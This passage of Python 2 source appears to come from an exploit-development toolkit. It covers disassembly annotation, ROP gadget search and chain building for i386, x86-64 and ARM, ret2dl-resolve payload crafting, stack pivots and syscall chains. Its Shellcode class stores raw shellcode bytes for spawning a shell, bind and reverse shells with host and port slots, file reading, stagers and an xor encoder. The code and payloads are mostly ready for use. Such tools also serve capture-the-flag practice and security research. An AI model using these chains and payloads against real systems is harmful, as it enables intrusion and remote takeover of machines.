data_xrefs.setdefault(ref, set()).add(addr)
for k, v in code_xrefs.iteritems():
code_xrefs[k] = sorted(list(v))
for k, v in data_xrefs.iteritems():
data_xrefs[k] = sorted(list(v))
# output with annotations
def repl_func1(addr):
def _f(m):
op = m.group(1)
ref = int16(m.group(2))
if op.startswith('call'):
color = 33
else:
color = 32 if ref > addr else 35
return "\x1b[%dm%s%s [%+#x]\x1b[0m" % (color, m.group(1), labels[ref], ref-addr)
return _f
def repl_func2(color):
def _f(m):
addr = int16(m.group(1))
if addr in labels and not addr in rev_symbol:
return ",\x1b[%dm%s\x1b[0m" % (color, labels[addr])
else:
return m.group(0)
return _f
arrows = {}
for k, v in [(True, u'\u25b2'), (False, u'\u25bc')]:
arrows[k] = v.encode('utf-8')
for line, addr, expr in lines:
if addr is None:
print line
continue
line = re.sub(r'(call\s+)[\dA-Fa-f]{3,}\s+<([\w@\.]+)>', '\x1b[33m\\1\\2\x1b[0m', line)
line = re.sub(r'(call\s+)(?:0x)?([\dA-Fa-f]{3,})\b.*', repl_func1(addr), line)
line = re.sub(r'(j\w{1,2}\s+)[\dA-Fa-f]{3,}\s+<([\w@\.]+)>', '\x1b[32m\\1\\2\x1b[0m', line)
line = re.sub(r'(j\w{1,2}\s+)(?:0x)?([\dA-Fa-f]{3,})\b.*', repl_func1(addr), line)
line = re.sub(r',0x([\dA-Fa-f]{3,})\b', repl_func2(36), line)
expr = line.split(':', 1)[1]
label = ''
if labels[addr]:
if not addr in rev_symbol and not addr in rev_plt:
if labels[addr].startswith('loc_'):
label += "\x1b[38;1m%s:\x1b[0m" % labels[addr]
label = label.ljust(78+11)
else:
label += "\x1b[33m%s:\x1b[0m" % labels[addr]
label = label.ljust(78+9)
else:
label = label.ljust(78)
if addr in code_xrefs:
ary = ["%x%s" % (x, arrows[x < addr]) for x in code_xrefs[addr]]
label += " \x1b[30;1m; CODE XREF: %s\x1b[0m" % ', '.join(ary)
if addr in data_xrefs:
ary = ["%x%s" % (x, arrows[x < addr]) for x in data_xrefs[addr]]
label += " \x1b[30;1m; DATA XREF: %s\x1b[0m" % ', '.join(ary)
if addr == self._entry_point:
label += ' \x1b[30;1m; ENTRY POINT\x1b[0m'
if label:
print label
annotations = []
for m in re.finditer(r'([\dA-Fa-f]{3,})\b', expr):
ref = int16(m.group(1))
if 0 <= ref - self._section['.data'][0] < self._section['.data'][1]:
annotations.append('[.data]')
elif 0 <= ref - self._section['.bss'][0] < self._section['.bss'][1]:
annotations.append('[.bss]')
if ref in rev_symbol:
annotations.append(', '.join(rev_symbol[ref]))
if ref in self._string:
annotations.append(repr(self._string[ref]))
if annotations:
print "%-70s \x1b[30;1m; %s\x1b[0m" % (line, ' '.join(annotations))
else:
print line
if re.search(r'\t(?:ret|jmp)', line):
print "\x1b[30;1m; %s\x1b[0m" % ('-' * 78)
class ROP(ELF):
def __init__(self, *args, **kwargs):
ELF.__init__(self, *args, **kwargs)
if self.arch == 'i386':
self.__class__ = type('ROP_I386', (ROP_I386,), {})
elif self.arch == 'x86-64':
self.__class__ = type('ROP_X86_64', (ROP_X86_64,), {})
elif self.arch == 'arm':
self.__class__ = type('ROP_ARM', (ROP_ARM,), {})
else:
raise Exception("unknown architecture: %r" % self.arch)
def p(self, x):
if self.wordsize == 8:
return p64(x)
else:
return p32(x)
def gadget(self, s):
return self.search(s, xonly=True)
def string(self, s):
return s + '\x00'
def junk(self, n=1):
return self.fill(self.wordsize * n)
def fill(self, size, buf=''):
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
buflen = size - len(buf)
assert buflen >= 0, "%d bytes over" % (-buflen,)
return ''.join(random.choice(chars) for i in xrange(buflen))
def align(self, addr, origin, size):
padlen = size - ((addr-origin) % size)
return (addr+padlen, padlen)
def load(self, blob, base=0):
self._load_blobs += [(base, blob, True)]
def scan_gadgets(self, regexp):
for virtaddr, blob, is_executable in self._load_blobs:
if not is_executable:
continue
for m in re.finditer(regexp, blob):
if self.arch == 'arm':
arch = 'thumb'
else:
arch = self.arch
p = Popen(Asm.cmd[arch]['objdump_binary'] + ["--adjust-vma=%d" % virtaddr, "--start-address=%d" % (virtaddr+m.start()), self.fpath], stdout=PIPE)
stdout, stderr = p.communicate()
lines = stdout.splitlines()[7:]
if '\t(bad)' in lines[0]:
continue
for line in lines:
print line
if re.search(r'\t(?:ret|jmp|\(bad\)|; <UNDEFINED> instruction|\.\.\.)', line):
print '-' * 80
break
def list_gadgets(self):
raise NotImplementedError("not implemented for this architecture: %r" % self.arch)
class ROP_I386(ROP):
regs = ['eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi']
def gadget(self, keyword, reg=None, n=1):
def regexp_or(*args):
return re.compile('(?:' + '|'.join(map(re.escape, args)) + ')')
table = {
'pushad': '\x60\xc3',
'popad': '\x61\xc3',
'leave': '\xc9\xc3',
'ret': '\xc3',
'int3': '\xcc',
'int80': '\xcd\x80',
'call_gs10': '\x65\xff\x15\x10\x00\x00\x00',
'syscall': '\x0f\x05',
}
if keyword in table:
return self.search(table[keyword], xonly=True)
if reg:
try:
r = self.regs.index(reg)
except ValueError:
raise Exception("unexpected register: %r" % reg)
else:
r = self.regs.index('esp')
if keyword == 'pop':
if reg:
chunk1 = chr(0x58+r) + '\xc3'
chunk2 = '\x8f' + chr(0xc0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# skip esp
return self.search(re.compile(r"(?:[\x58-\x5b\x5d-\x5f]|\x8f[\xc0-\xc3\xc5-\xc7]){%d}\xc3" % n), xonly=True)
elif keyword == 'call':
chunk = '\xff' + chr(0xd0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp':
chunk = '\xff' + chr(0xe0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp_ptr':
chunk = '\xff' + chr(0x20+r)
return self.search(chunk, xonly=True)
elif keyword == 'push':
chunk1 = chr(0x50+r) + '\xc3'
chunk2 = '\xff' + chr(0xf0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'pivot':
# chunk1: xchg REG, esp
# chunk2: xchg esp, REG
if r == 0:
chunk1 = '\x94\xc3'
else:
chunk1 = '\x87' + chr(0xe0+r) + '\xc3'
chunk2 = '\x87' + chr(0xc4+8*r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'loop':
chunk1 = '\xeb\xfe'
chunk2 = '\xe9\xfb\xff\xff\xff'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# search directly
return ROP.gadget(self, keyword)
def call(self, addr, *args):
if isinstance(addr, str):
addr = self.plt(addr)
buf = self.p(addr)
buf += self.p(self.gadget('pop', n=len(args)))
buf += self.p(args)
return buf
def call_chain_ptr(self, *calls, **kwargs):
raise Exception('support x86-64 only')
def dl_resolve_data(self, base, name):
jmprel = self.dynamic('JMPREL')
relent = self.dynamic('RELENT')
symtab = self.dynamic('SYMTAB')
syment = self.dynamic('SYMENT')
strtab = self.dynamic('STRTAB')
addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
addr_sym, padlen_sym = self.align(addr_reloc+relent, symtab, syment)
addr_symstr = addr_sym + syment
r_info = (((addr_sym - symtab) / syment) << 8) | 0x7
st_name = addr_symstr - strtab
buf = self.fill(padlen_reloc)
buf += struct.pack('<II', base, r_info) # Elf32_Rel
buf += self.fill(padlen_sym)
buf += struct.pack('<IIII', st_name, 0, 0, 0x12) # Elf32_Sym
buf += self.string(name)
return buf
def dl_resolve_call(self, base, *args):
jmprel = self.dynamic('JMPREL')
relent = self.dynamic('RELENT')
addr_reloc, padlen_reloc = self.align(base, jmprel, relent)
reloc_offset = addr_reloc - jmprel
buf = self.p(self.plt())
buf += self.p(reloc_offset)
buf += self.p(self.gadget('pop', n=len(args)))
buf += self.p(args)
return buf
def syscall(self, number, *args):
try:
arg_regs = ['ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp']
buf = self.p([self.gadget('pop', 'eax'), number])
for arg_reg, arg in zip(arg_regs, args):
buf += self.p([self.gadget('pop', arg_reg), arg])
except ValueError:
# popad = pop edi, esi, ebp, esp, ebx, edx, ecx, eax
args = list(args) + [0] * (6-len(args))
buf = self.p([self.gadget('popad'), args[4], args[3], args[5], 0, args[0], args[2], args[1], number])
buf += self.p(self.gadget('int80'))
return buf
def pivot(self, rsp):
buf = self.p([self.gadget('pop', 'ebp'), rsp-self.wordsize])
buf += self.p(self.gadget('leave'))
return buf
def retfill(self, size, buf=''):
buflen = size - len(buf)
assert buflen >= 0, "%d bytes over" % (-buflen,)
s = self.fill(buflen % self.wordsize)
s += self.p(self.gadget('ret')) * (buflen // self.wordsize)
return s
def list_gadgets(self):
print "%8s" % 'pop',
for i in range(6):
try:
self.gadget('pop', n=i+1)
print "\033[32m%d\033[m" % (i+1),
except ValueError:
print "\033[31m%d\033[m" % (i+1),
print
for keyword in ['pop', 'jmp', 'jmp_ptr', 'call', 'push', 'pivot']:
print "%8s" % keyword,
for reg in self.regs:
try:
self.gadget(keyword, reg)
print "\033[32m%s\033[m" % reg,
except ValueError:
print "\033[31m%s\033[m" % reg,
print
print "%8s" % 'etc',
for keyword in ['pushad', 'popad', 'leave', 'ret', 'int3', 'int80', 'call_gs10', 'syscall', 'loop']:
try:
self.gadget(keyword)
print "\033[32m%s\033[m" % keyword,
except ValueError:
print "\033[31m%s\033[m" % keyword,
print
class ROP_X86_64(ROP):
regs = ['rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
def gadget(self, keyword, reg=None, n=1):
def regexp_or(*args):
return re.compile('(?:' + '|'.join(map(re.escape, args)) + ')')
table = {
'leave': '\xc9\xc3',
'ret': '\xc3',
'int3': '\xcc',
'int80': '\xcd\x80',
'call_gs10': '\x65\xff\x15\x10\x00\x00\x00',
'syscall': '\x0f\x05',
}
if keyword in table:
return self.search(table[keyword], xonly=True)
if reg:
try:
r = self.regs.index(reg)
need_prefix = bool(r >= 8)
if need_prefix:
r -= 8
except ValueError:
raise Exception("unexpected register: %r" % reg)
else:
r = self.regs.index('rsp')
need_prefix = False
if keyword == 'pop':
if reg:
prefix = '\x41' if need_prefix else ''
chunk1 = prefix + chr(0x58+r) + '\xc3'
chunk2 = prefix + '\x8f' + chr(0xc0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# skip rsp
return self.search(re.compile(r"(?:[\x58-\x5b\x5d-\x5f]|\x8f[\xc0-\xc3\xc5-\xc7]|\x41(?:[\x58-\x5f]|\x8f[\xc0-\xc7])){%d}\xc3" % n), xonly=True)
elif keyword == 'call':
prefix = '\x41' if need_prefix else ''
chunk = prefix + '\xff' + chr(0xd0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp':
prefix = '\x41' if need_prefix else ''
chunk = prefix + '\xff' + chr(0xe0+r)
return self.search(chunk, xonly=True)
elif keyword == 'jmp_ptr':
prefix = '\x41' if need_prefix else ''
chunk = prefix + '\xff' + chr(0x20+r)
return self.search(chunk, xonly=True)
elif keyword == 'push':
prefix = '\x41' if need_prefix else ''
chunk1 = prefix + chr(0x50+r) + '\xc3'
chunk2 = prefix + '\xff' + chr(0xf0+r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'pivot':
# chunk1: xchg REG, rsp
# chunk2: xchg rsp, REG
if need_prefix:
chunk1 = '\x49\x87' + chr(0xe0+r) + '\xc3'
chunk2 = '\x4c\x87' + chr(0xc4+8*r) + '\xc3'
else:
if r == 0:
chunk1 = '\x48\x94\xc3'
else:
chunk1 = '\x48\x87' + chr(0xe0+r) + '\xc3'
chunk2 = '\x48\x87' + chr(0xc4+8*r) + '\xc3'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
elif keyword == 'loop':
chunk1 = '\xeb\xfe'
chunk2 = '\xe9\xfb\xff\xff\xff'
return self.search(regexp_or(chunk1, chunk2), xonly=True)
else:
# search directly
return ROP.gadget(self, keyword)
def call(self, addr, *args):
if isinstance(addr, str):
addr = self.plt(addr)
regs = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
buf = ''
for i, arg in enumerate(args):
buf += self.p([self.gadget('pop', regs[i]), arg])
buf += self.p(addr)
buf += self.p(args[6:])
return buf
def call_chain_ptr(self, *calls, **kwargs):
gadget_candidates = [
# gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
# Ubuntu clang version 3.0-6ubuntu3 (tags/RELEASE_30/final) (based on LLVM 3.0)
('\x4c\x89\xfa\x4c\x89\xf6\x44\x89\xef\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', False),
# gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-4)
('\x4c\x89\xfa\x4c\x89\xf6\x44\x89\xef\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x72\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', False),
# gcc 4.8.2-19ubuntu1
('\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', True),
# gcc (Ubuntu 4.8.2-19ubuntu1) 4.8.2
('\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x83\xc4\x08\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\x41\x5f\xc3', True),
]
for chunk1, chunk2, _args_reversed in gadget_candidates:
try:
set_regs = self.gadget(chunk2)
call_ptr = self.gadget(chunk1 + chunk2)
args_reversed = _args_reversed
break
except ValueError:
pass
else:
raise Exception('gadget not found')
buf = self.p(set_regs)
for args in calls:
if len(args) > 4:
raise Exception('4th argument and latter should be set in advance')
elif args[1] >= (1<<32):
raise Exception("1st argument should be less than 2^32: %x" % args[1])
ptr = args.pop(0)
if isinstance(ptr, str):
ptr = self.got(ptr)
buf += self.junk()
buf += self.p([0, 1, ptr])
if not args_reversed:
for arg in args:
buf += self.p(arg)
buf += self.p(0) * (3-len(args))
else:
buf += self.p(0) * (3-len(args))
for arg in reversed(args):
buf += self.p(arg)
buf += self.p(call_ptr)
buf += self.junk()
if 'pivot' in kwargs:
buf += self.p(0)
buf += self.p(kwargs['pivot'] - self.wordsize)
buf += self.p(0) * 4
buf += self.p(self.gadget('leave'))
else:
buf += self.p(0) * 6
return buf
def dl_resolve_data(self, base, name):
jmprel = self.dynamic('JMPREL')
relaent = self.dynamic('RELAENT')
symtab = self.dynamic('SYMTAB')
syment = self.dynamic('SYMENT')
strtab = self.dynamic('STRTAB')
addr_reloc, padlen_reloc = self.align(base, jmprel, relaent)
addr_sym, padlen_sym = self.align(addr_reloc+relaent, symtab, syment)
addr_symstr = addr_sym + syment
r_info = (((addr_sym - symtab) / syment) << 32) | 0x7
st_name = addr_symstr - strtab
buf = self.fill(padlen_reloc)
buf += struct.pack('<QQQ', base, r_info, 0) # Elf64_Rela
buf += self.fill(padlen_sym)
buf += struct.pack('<IIQQ', st_name, 0x12, 0, 0) # Elf64_Sym
buf += self.string(name)
return buf
def dl_resolve_call(self, base, *args):
# prerequisite:
# 1) overwrite (link_map + 0x1c8) with NULL
# 2) set registers for arguments
if args:
raise Exception('arguments must be set to the registers beforehand')
jmprel = self.dynamic('JMPREL')
relaent = self.dynamic('RELAENT')
addr_reloc, padlen_reloc = self.align(base, jmprel, relaent)
reloc_offset = (addr_reloc - jmprel) / relaent
buf = self.p(self.plt())
buf += self.p(reloc_offset)
return buf
def syscall(self, number, *args):
arg_regs = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']
buf = self.p([self.gadget('pop', 'rax'), number])
for arg_reg, arg in zip(arg_regs, args):
buf += self.p([self.gadget('pop', arg_reg), arg])
buf += self.p(self.gadget('syscall'))
return buf
def pivot(self, rsp):
buf = self.p([self.gadget('pop', 'rbp'), rsp-self.wordsize])
buf += self.p(self.gadget('leave'))
return buf
def retfill(self, size, buf=''):
buflen = size - len(buf)
assert buflen >= 0, "%d bytes over" % (-buflen,)
s = self.fill(buflen % self.wordsize)
s += self.p(self.gadget('ret')) * (buflen // self.wordsize)
return s
def list_gadgets(self):
print "%8s" % 'pop',
for i in range(6):
try:
self.gadget('pop', n=i+1)
print "\033[32m%d\033[m" % (i+1),
except ValueError:
print "\033[31m%d\033[m" % (i+1),
print
for keyword in ['pop', 'jmp', 'jmp_ptr', 'call', 'push', 'pivot']:
print "%8s" % keyword,
for reg in self.regs:
try:
self.gadget(keyword, reg)
print "\033[32m%s\033[m" % reg,
except ValueError:
print "\033[31m%s\033[m" % reg,
print
print "%8s" % 'etc',
for keyword in ['leave', 'ret', 'int3', 'int80', 'call_gs10', 'syscall', 'loop']:
try:
self.gadget(keyword)
print "\033[32m%s\033[m" % keyword,
except ValueError:
print "\033[31m%s\033[m" % keyword,
print
class ROP_ARM(ROP):
def pt(self, x):
if isinstance(x, str):
return (self(x) | 1)
else:
return self.p(x | 1)
def gadget(self, keyword, reg=None, n=1):
table = {
'pivot_r7': '\xbd\x46\x80\xbd', # mov sp, r7; pop {r7, pc}
'pivot_fp': '\x0b\xd0\xa0\xe1\x00\x88\xbd\xe8', # mov sp, fp; pop {fp, pc}
'pop_r0_3fp': '\xbd\xe8\x0f\x88', # ldmia.w sp!, {r0, r1, r2, r3, fp, pc}
'pop_r4_7': '\xf0\xbd', # pop {r4, r5, r6, r7, pc}
'svc0': '\x00\xdf', # svc 0
}
if keyword in table:
return self.search(table[keyword], xonly=True)
# search directly
return ROP.gadget(self, keyword)
def call_chain(self, *calls, **kwargs):
gadget_candidates = [
# gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
('\x30\x46\x39\x46\x42\x46\x01\x34\x98\x47\x4c\x45\xf6\xd1', '\xbd\xe8\xf8\x83', True),
# gcc (Ubuntu/Linaro 4.8.2-19ubuntu1) 4.8.2
('\x38\x46\x41\x46\x4a\x46\x98\x47\xb4\x42\xf6\xd1', '\xbd\xe8\xf8\x83', False),
]
for chunk1, chunk2, _is_4_6 in gadget_candidates:
try:
set_regs = self.gadget(chunk2)
call_reg = self.gadget(chunk1 + chunk2)
is_4_6 = _is_4_6
break
except ValueError:
pass
else:
raise Exception('gadget not found')
buf = self.pt(set_regs)
for args in calls:
if len(args) > 4:
raise Exception('4th argument and latter should be set in advance')
addr = args.pop(0)
if isinstance(addr, str):
addr = self.plt(addr)
if is_4_6:
buf += self.p(addr)
buf += self.p([0, 0])
for arg in args:
buf += self.p(arg)
buf += self.p(0) * (3-len(args))
buf += self.p(1)
buf += self.pt(call_reg)
else:
buf += self.p(addr)
buf += self.p([0, 0, 0])
for arg in args:
buf += self.p(arg)
buf += self.p(0) * (3-len(args))
buf += self.pt(call_reg)
if 'pivot' in kwargs:
try:
pivot_r7 = self.gadget('pivot_r7')
buf += self.p(0) * 4
buf += self.p(kwargs['pivot'] - self.wordsize)
buf += self.p(0) * 2
buf += self.pt(pivot_r7)
except ValueError:
buf += self.p(0) * 7
buf += self.pivot(kwargs['pivot'])
else:
buf += self.p(0) * 7
return buf
def syscall(self, number, *args):
args0_3, args4_6 = args[:4], args[4:7]
buf = self.pt(self.gadget('pop_r0_3fp'))
for arg in args0_3:
buf += self.p(arg)
buf += self.p(0) * (4-len(args0_3))
buf += self.p(0)
buf += self.pt(self.gadget('pop_r4_7'))
for arg in args4_6:
buf += self.p(arg)
buf += self.p(0) * (3-len(args4_6))
buf += self.p(number)
buf += self.pt(self.gadget('svc0'))
return buf
def pivot(self, rsp):
try:
addr = self.gadget('pivot_r7')
return self.p([addr+2, rsp-self.wordsize, addr])
except ValueError:
addr = self.gadget('pivot_fp')
return self.p([addr+4, rsp-self.wordsize, addr])
def list_gadgets(self):
print "%8s" % 'pivot',
for keyword in ['pivot_r7', 'pivot_fp']:
try:
self.gadget(keyword)
print "\033[32m%s\033[m" % keyword,
except ValueError:
print "\033[31m%s\033[m" % keyword,
print
print "%8s" % 'syscall',
for keyword in ['pop_r0_3fp', 'pop_r4_7', 'svc0']:
try:
self.gadget(keyword)
print "\033[32m%s\033[m" % keyword,
except ValueError:
print "\033[31m%s\033[m" % keyword,
print
class Shellcode(object):
_database = {
'i386': {
'noppairs': ['AI', 'BJ', 'CK', 'FN', 'GO'],
'exec_shell': '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80',
'exec_command': '\xeb\x29\x5e\x31\xc9\x8a\x0e\x46\x88\x2c\x0e\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80\xe8\xd2\xff\xff\xff',
'dup': '\x31\xd2\x8d\x5a${fd}\x8d\x4a\x02\x8d\x42\x3f\xcd\x80\x49\x7d\xf8',
'readfile': '\xeb\x2d\x5b\x31\xc9\x8a\x0b\x43\x88\x2c\x0b\x31\xc9\x8d\x41\x05\xcd\x80\x93\x91\x8d\x50\x01\xc1\xe2\x0c\x6a\x03\x58\xcd\x80\x92\x6a${fd}\x5b\x6a\x04\x58\xcd\x80\x31\xdb\x8d\x43\x01\xcd\x80\xe8\xce\xff\xff\xff',
'readdir': '\xeb\x41\x5b\x31\xc9\x8a\x0b\x43\x88\x2c\x0b\x31\xff\x31\xc9\x8d\x47\x05\xcd\x80\x93\x91\x8d\x57\x01\x8d\x47\x59\x60\xcd\x80\x87\xce\x85\xc0\x74\x17\x66\x8b\x56\x08\x8d\x4e\x0a\xc6\x04\x11\x0a\x42\x8d\x5f${fd}\x8d\x47\x04\xcd\x80\x61\xeb\xe0\x31\xdb\x8d\x47\x01\xcd\x80\xe8\xba\xff\xff\xff',
'read_stager': '\xeb\x0f\x59\x6a\x03\x58\x99\x89\xd3\x42\xc1\xe2\x0c\xcd\x80\xff\xe1\xe8\xec\xff\xff\xff',
'mmap_stager': '\x6a\x5a\x58\x99\x89\xd1\x42\xc1\xe2\x0c\x51\x6a\xff\x6a\x22\x6a\x07\x52\x51\x89\xe3\xcd\x80\x91\x93\x8d\x43\x03\xcd\x80\xff\xe1',
'alnum_stager': 'Yh3333k4dsFkDqG02DqH0D10u03P3H1o0j2B0207393s3q103a8P7l3j4s3B065k3O4N8N8O03',
'bind_shell': '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x66\x68${port}\x66\x6a\x02\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80',
'reverse_shell': '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68${host}\x66\x68${port}\x66\x6a\x02\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80',
'xor': '\xeb\x0f\x5e\x80\x36${key}\x74\x0e\x46\xeb\xf8${key}${key}${key}${key}${key}${key}\xe8\xec\xff\xff\xff',
},
'x86-64': {
'noppairs': ['PX', 'QY', 'RZ'],
'exec_shell': '\x6a\x3b\x58\x48\x99\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
'exec_command': '\xeb\x31\x5e\x48\x31\xc9\x8a\x0e\x48\xff\xc6\x88\x2c\x0e\x6a\x3b\x58\x48\x99\x52\x66\x68\x2d\x63\x48\x89\xe3\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x56\x53\x57\x48\x89\xe6\x0f\x05\xe8\xca\xff\xff\xff',
'dup': '\x6a${fd}\x5f\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x7d\xf6',
'readfile': '\xeb\x33\x5f\x48\x31\xc9\x8a\x0f\x48\xff\xc7\x88\x2c\x0f\x48\x31\xf6\x6a\x02\x58\x0f\x05\x48\x97\x48\x96\x6a\x01\x5a\x48\xc1\xe2\x0c\x0f\x05\x48\x92\x6a${fd}\x5f\x6a\x01\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05\xe8\xc8\xff\xff\xff',
'readdir': '\xeb\x57\x5f\x48\x31\xc9\x8a\x0f\x48\xff\xc7\x88\x2c\x0f\x48\x31\xf6\x6a\x02\x58\x0f\x05\x48\x97\x48\x96\x48\x31\xd2\x66\xf7\xd2\x6a\x4e\x58\x0f\x05\x48\x8b\x06\x48\x85\xc0\x74\x24\x66\x8b\x56\x10\x4c\x8d\x04\x16\x48\x83\xea\x14\x48\x8d\x76\x12\xc6\x04\x16\x0a\x48\xff\xc2\x6a${fd}\x5f\x6a\x01\x58\x0f\x05\x4c\x89\xc6\xeb\xd4\x48\x31\xff\x6a\x3c\x58\x0f\x05\xe8\xa4\xff\xff\xff',
'read_stager': '\xeb\x13\x5e\x48\x31\xff\x48\x8d\x57\x01\x48\xc1\xe2\x0c\x48\x31\xc0\x0f\x05\xff\xe6\xe8\xe8\xff\xff\xff',
'mmap_stager': '\x4d\x31\xc9\x6a\xff\x41\x58\x6a\x22\x41\x5a\x6a\x07\x5a\x49\x8d\x71\x01\x48\xc1\xe6\x0c\x48\x31\xff\x6a\x09\x58\x0f\x05\x48\x96\x48\x92\x48\x31\xc0\x0f\x05\xff\xe6',
'alnum_stager': 'h0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M367p0h1O0A8O7p5L2x01193i4m7k08144L7m1M3K043I3A8L4V8K0m',
'bind_shell': '\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\xba\xf2\xff${port}\x66\x83\xf2\xf0\x52\x48\x89\xe6\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
'reverse_shell': '\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x68${host}\x66\x68${port}\x66\x6a\x02\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
'xor': '\xeb\x0f\x5e\x80\x36${key}\x74\x0e\x48\xff\xc6\xeb\xf6${key}${key}${key}${key}\xe8\xec\xff\xff\xff',
},
'arm': {
'exec_shell': '\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x2f\x73\x68',
},
}
def __init__(self, arch):
if arch not in self._database:
raise Exception("unsupported architechture: %r" % arch)
self.arch = arch
def get(self, name, **kwargs):
if name not in self._database[self.arch]:
raise Exception("unsupported shellcode for %s architecture: %r" % (arch, name))
sc = self._database[self.arch][name]
for k, v in kwargs.iteritems():
sc = sc.replace("${%s}" % k, v)
return sc
def nopfill(self, code, size, buf=''):
noppairs = self.get('noppairs')
buflen = size - len(buf) - len(code)
assert buflen >= 0, "%d bytes over" % (-buflen,)
buf = ''
while len(buf) < buflen:
buf += random.choice(noppairs)
return buf[:buflen] + code
def exec_shell(self):
return self.get('exec_shell')
def exec_command(self, command):
return self.get('exec_command') + chr(len(command)) + command
def dup(self, code, fd):
return self.get('dup', fd=chr(fd)) + code
def readfile(self, path, fd=1):
return self.get('readfile', fd=chr(fd)) + chr(len(path)) + path
def readdir(self, path, fd=1):
return self.get('readdir', fd=chr(fd)) + chr(len(path)) + path
def read_stager(self):
return self.get('read_stager')
def mmap_stager(self):
return self.get('mmap_stager')
def alnum_stager(self, reg):
if self.arch == 'i386':
r = ['eax', 'ecx', 'edx', 'ebx', 'esi', 'edi', 'esi', 'edi'].index(reg)
